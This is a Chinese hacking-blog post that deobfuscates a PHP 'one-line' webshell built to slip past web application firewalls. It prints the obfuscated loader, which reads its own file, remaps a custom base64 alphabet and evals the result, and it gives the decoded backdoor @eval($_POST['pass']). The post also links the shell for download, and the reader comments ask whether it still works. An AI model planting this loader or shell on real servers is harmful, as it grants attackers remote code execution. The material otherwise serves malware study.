一款过waf的一句话木马分析 - 颓废's Blog

一款过waf的一句话木马分析

  • 内容
  • 相关

中午,下班回来,就看一个朋友给我发了几个马儿  让我看看解解密码  很简单

1.png2.png


猛不猛我不知道   那时候手机  太长的看着就烦   就回到家瞅瞅了

首先我们看这个马儿


4.png

一步步来,先分析前面的。前面的PHP代码部分有一个eval,我们改成echo试试

5.png

输出得到


$OO0OO0000=$OOO000000{17}.$OOO000000{12}.$OOO000000{18}.$OOO000000{5}.$OOO000000{19};if(!0)$O000O0O00=$OO0OO0000($OOO0O0O00,'rb');$OO0OO000O=$OOO000000{17}.$OOO000000{20}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OO0OO00O0=$OOO000000{14}.$OOO000000{0}.$OOO000000{20}.$OOO000000{0}.$OOO000000{20};$OO0OO000O($O000O0O00,1136);$OO00O00O0=($OOO0000O0($OO0OO00O0($OO0OO000O($O000O0O00,380),'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));eval($OO00O00O0);
替换进去得到


6.png

下来我们就要分析了


<?php
$OOO0O0O00=__FILE__;
//$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');

$OOO000000='th6sbehqla4co_sadfpnr';

$OO00O0000=248;

//$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};
//$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};
//$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};
$OOO0000O0='base64_decode';

$O0O0000O0='OOO0000O0';

//$OO0OO0000=$OOO000000{17}.$OOO000000{12}.$OOO000000{18}.$OOO000000{5}.$OOO000000{19};
$OO0OO0000='fopen';

//if(!0)$O000O0O00=$OO0OO0000($OOO0O0O00,'rb');
$O000O0O00=fopen($OOO0O0O00,'rb');

//$OO0OO000O=$OOO000000{17}.$OOO000000{20}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};
$OO0OO000O=='fread';

//$OO0OO00O0=$OOO000000{14}.$OOO000000{0}.$OOO000000{20}.$OOO000000{0}.$OOO000000{20};
$OO0OO00O0='strtr';

//$OO0OO000O($O000O0O00,1136);
fread($O000O0O00,1136);

/*$OO00O00O0=($OOO0000O0(
    $OO0OO00O0(
	            $OO0OO000O($O000O0O00,380),
				'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',
				'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
				)
			)
);*/

$OO00O00O0=(base64_decode(
	strtr(
		$OO0OO000O($O000O0O00,380),
		'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',
		'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
		)
	)
);


;eval($OO00O00O0);
return;
?>
分析后总结得到



$OOO0O0O00=__FILE__;//获取当前文件名
$O000O0O00=fopen($OOO0O0O00,'rb');//打开文件
fread($O000O0O00,248);//跳过248字节
$OO00O00O0=(base64_decode(
	strtr(
		fread($O000O0O00,380),
		'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',
		'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
		)
	)
);//读取380字节,根据代码表替换字符,base64解码
eval($OO00O00O0);//执行解码后的代码
10.png



解得


@eval($_POST['pass']);//密码就等于pass

怎么解得卖个关子  不会的可以看看

管理员设置 回复 可见隐藏内容




  文件名稱:一句话木马

  更新時間:

  下載声明:密码: gadu

立即下載

下载链接

网盘下载

密码: gadu

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:一款过waf的一句话木马分析 - https://www.0dayhack.com/post-836.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

16条评论
  1. avatar

    haizi Lv.1 Chrome 55.0.2883.87 Chrome 55.0.2883.87 Windows Windows 回复

    学习一下,现在还能用吗,我去试一试

    广东省广州市 电信

    1. avatar

      lpflpf960 Lv.1 Chrome 55.0.2883.87 Chrome 55.0.2883.87 Windows 7 x64 Edition Windows 7 x64 Edition 回复

      666666666666666666666666666666666

      北京市 移动

      1. avatar

        wooluo0dayhack Lv.2 Chrome 67.0.3396.87 Chrome 67.0.3396.87 Mac OS X 10.13.2 Mac OS X 10.13.2 回复

        6666666666666666厉害了

        北京市 水利部

        1. avatar

          lz520520 Lv.1 Sogou Explorer Sogou Explorer Windows Windows 回复

          6666666666666666厉害了

          上海市 联通

          1. avatar

            流浪少年。 Lv.1 Chrome 53.0.2785.104 Chrome 53.0.2785.104 Windows Windows 回复

            学习  学习

            广东省中山市 移动

            1. avatar

              asda234d Lv.1 Firefox 60.0 Firefox 60.0 Windows Windows 回复

              学习

              福建省福州市 电信

              1. avatar

                逍 遥1 Lv.1 Chrome 55.0.2883.87 Chrome 55.0.2883.87 Windows 7 x64 Edition Windows 7 x64 Edition 回复

                看一看         学习  学习

                河南省郑州市 联通

                1. avatar

                  孙笑 Lv.1 Chrome 65.0.3325.162 Chrome 65.0.3325.162 Windows Windows 回复

                  看一下下 学习学习

                  山东省济南市 电信

                  1. avatar

                    lai52014 Lv.1 Firefox 59.0 Firefox 59.0 Windows Windows 回复

                    厉害哦

                    广东省佛山市南海区 电信

                    1. avatar

                      孙笑川 Lv.1 Safari Safari iPhone iOS 10.3.3 iPhone iOS 10.3.3 回复

                      给力 看看怎么解

                      山东省东营市 电信